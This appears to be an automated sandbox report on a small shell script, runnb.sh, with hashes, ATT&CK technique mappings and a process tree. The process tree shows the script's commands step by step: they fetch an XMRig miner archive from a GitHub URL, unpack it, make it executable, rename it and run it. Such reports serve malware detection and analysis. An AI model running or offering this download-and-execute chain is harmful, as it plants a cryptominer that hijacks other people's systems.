a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Analysis

max time kernel
60s
max time network
63s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
30-10-2024 07:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmod

pid process

771 chmod
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

709 sudo
Reads CPU attributes 1 TTPs 2 IoCs
discovery

System Information Discovery
T1082

Processes:

exim4exim4

description ioc process

File opened for reading /sys/devices/system/cpu/online exim4
File opened for reading /sys/devices/system/cpu/online exim4

pid	process
771	chmod

pid	process
709	sudo

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

tarsudodpkgaptmvsendmailsendmailaptdpkgdpkgdpkg

description	ioc	process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

Processes:

aptapt

description	ioc	process
File opened for modification	/tmp/fileutl.message.oJsfFK	apt
File opened for modification	/tmp/fileutl.message.6V24ff	apt
File opened for modification	/tmp/fileutl.message.I3haiP	apt
File opened for modification	/tmp/fileutl.message.gXQoLN	apt
File opened for modification	/tmp/fileutl.message.loMvz3	apt
File opened for modification	/tmp/fileutl.message.ouhuJA	apt
File opened for modification	/tmp/fileutl.message.pToxuj	apt
File opened for modification	/tmp/fileutl.message.uSU5ko	apt

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:706
- /usr/bin/sudo
  sudo apt install wget
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:709
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:724
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t620l-0000Bg-LF
      4⤵
      Reads CPU attributes
      PID:737
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:728
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t620l-0000Bk-KJ
      4⤵
      Reads CPU attributes
      PID:738
- - /usr/bin/apt
    apt install wget
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:731
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:734
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:744
- /usr/bin/apt
  apt install wget
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:766
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:767
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:768
- /usr/bin/wget
  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  2⤵
  PID:769
- /bin/tar
  tar xvf xmrigtar.tar.gz
  2⤵
  - Reads runtime system information
  PID:770
- /bin/chmod
  chmod +x xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /bin/mv
  mv xmrig cool
  2⤵
  - Reads runtime system information
  PID:772
- /tmp/cool
  ./cool
  2⤵
  PID:773

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
847B

MD5
bf4182d86e020bf938bd32ec985c62dd

SHA1
2476fcac37a7440d121c18d63048c4ed00b58446

SHA256
a9efd7602b386ebe2c7b53cd580a5820834ab3da2dfe49c810efd779c27d1589

SHA512
0974af6aa78e89a38ebc8e1bbb25ab19f510a9f88c10894f78814e8ffc37f80a857ecdd34e1ec7172ca62ced8a880399078f5bb769d5fdba3aee1db2fd65864d

Download Submit
/var/mail/user

Filesize
1KB

MD5
8f5a6d7682697cc73d93d9c28a1b33f8

SHA1
5ba114473db4d4da28e96d97bb0abdbf97ee32d6

SHA256
eafdbe7aadd911911836aec45a34dfd9e4b7081d7ce2cc774666a158ef7cd537

SHA512
c4252f40dfc3b9fc07aec5864911f66753ffa0fd17c8da15b0a9991a92d09260c9a88f072bd77d4d3d84d7215a58c980cc80f98c6089589dc2ff120d639cd439

Download Submit
/var/spool/exim4/input/1t620l-0000Bg-LF-D

Filesize
130B

MD5
f0961e544ff64875dc309b83b8750a84

SHA1
c07ab3e0c294d43b26776aa0fb14a4837e177019

SHA256
a51b5df027e0139fd408d454f1182eb744c69da3d04f1362dd404ee4489e86f9

SHA512
2c22927d980d9fd1c4d0f36b0fd16281c339b945fa2fd96532001dce44bd7bdd498a1ef7d9c9551eb8302edf375c3d24f6ed0d1bfee60f43023548e12485514e

Download Submit
/var/spool/exim4/input/1t620l-0000Bk-KJ-D

Filesize
147B

MD5
f2afad7ad86cac0f095d71fd5c03f9d8

SHA1
ed1d46b461fed8dbc55f3dc81fb022effb36658b

SHA256
f4a78fb61899ffd8593d915d9ae812940fd3d1d3edbb24acb832cc876f3fe562

SHA512
4e9bf1a8c8adbe1734df787e31525e6cc1bbcf54203c67d841031f57a73c8d0d4d00d797364caf2e4bff5b51344b1f000f44c32d3286b225ba265769ae058db3

Download Submit
/var/spool/exim4/input/1t620l-0000Bk-KJ-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/hdr.724

Filesize
918B

MD5
5c965c9eb35d9a5fdc498619f0b0dee6

SHA1
8f7a34cfe6ed6ca68f0e1682a16881b5c6548fdc

SHA256
27670f673368e8460599e6ae2b6363791b448525db33f32d24e4307cd59e5912

SHA512
8e47303ee783539d6f0b9838b5dea5c948da8b4f013eb73e79b54bf45e55e0bbc9ecb2170b2241a48f79e04f30f5c39cdf513da3e354a6b56f3065324e4b32a4

Download Submit
/var/spool/exim4/msglog/1t620l-0000Bg-LF

Filesize
288B

MD5
b8471cfaa0857928b385730343ee067c

SHA1
511f4d9965acc6fa9181d66e844de59d81179646

SHA256
c43e3cbf1272f39cdb0ed128fa501bbaee50fde3d71e9bf1a02db48c643758cc

SHA512
7e66234ded36378990d5441f9a2f1b508e7d0a999f343aff470ebae9f1f72537decde7cdb3839ddcdb8d893fa961fd3c1649733352cf73ecd4966aaa9670ffa7

Download Submit
/var/spool/exim4/msglog/1t620l-0000Bg-LF

Filesize
89B

MD5
26c5c903cfa4320d6ee19c3adafed2f4

SHA1
2c4ad0787d98d145e030d4fe2bbfad9c0712e7e6

SHA256
b03eaf1505db3112db904cc17dc304590472ae8a8dcc105e88f31fcf467814e3

SHA512
39d46ef92469e23644de7f45476de75e52643ace868c9c2104bd68a4cecacf7c41580dd86ced40e70bd35ac9b4dd2642259e6c3d558a6cee7d16f293dfeabcb1

Download Submit
/var/spool/exim4/msglog/1t620l-0000Bk-KJ

Filesize
288B

MD5
3f6b18dc8375e30629cb251a1e2d9049

SHA1
c28cf044b4f8b9aebd63fff0202fe9f5fe123315

SHA256
22a42466c73b2a70c0fac99dc7375c844dd40e0cb5b44e66a68b0c62f9940f29

SHA512
182ade507f5d94c41e1944ac56b7d0d85585130839ab5f8af88862459b133f44d3b4379b0c10e6eeddee608c651ca2d85cbd2436aa63a15263b22478d4b9707e

Download Submit
/var/spool/exim4/msglog/1t620l-0000Bk-KJ

Filesize
89B

MD5
17984f98ac58818cb31fb3ed3b4fad55

SHA1
035b237c8b447db2d893ef854d791826c2dd3096

SHA256
64b10a644daa6dd96b5af81b3fc1e8700df2d90dda3349268ad82394ee61ac47

SHA512
3d99c106ee19d75a329d0a414992af848819b82f2e473bea15bcaa188d0dd7f55b53c64b3e8d773932fe87fa0b0d85b456130248f87c7b70294ddda835364658

Download Submit